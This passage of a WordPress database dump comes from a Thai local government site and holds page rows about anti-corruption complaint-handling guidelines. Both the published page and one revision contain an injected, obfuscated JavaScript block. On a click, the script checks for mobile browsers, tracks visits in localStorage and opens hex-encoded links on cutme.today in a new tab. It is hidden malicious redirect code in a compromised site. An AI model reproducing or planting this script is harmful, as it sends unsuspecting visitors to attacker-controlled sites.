_0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','publish','closed','closed','','%e0%b9%81%e0%b8%99%e0%b8%a7%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%a3%e0%b8%b7','','','2025-06-27 13:40:32','2025-06-27 06:40:32','',0,'http://pakhaeng.ssk.in.th/?page_id=712',0,'page','',0),
(713,1,'2024-08-08 16:09:47','2024-08-08 09:09:47','','แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','','closed','','%e0%b9%81%e0%b8%99%e0%b8%a7%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%a3%e0%b8%b7','','','2024-08-08 16:09:47','2024-08-08 09:09:47','',712,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf',0,'attachment','application/pdf',0),
(714,1,'2024-08-08 16:09:50','2024-08-08 09:09:50','<!-- wp:file {\"id\":713,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ\"></object><a id=\"wp-block-file--media-28fe8f35-44aa-4053-af1b-b4293a78b1c2\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-28fe8f35-44aa-4053-af1b-b4293a78b1c2\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','712-revision-v1','','','2024-08-08 16:09:50','2024-08-08 09:09:50','',712,'http://pakhaeng.ssk.in.th/?p=714',0,'revision','',0),
(715,1,'2024-08-08 16:10:03','2024-08-08 09:10:03','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- 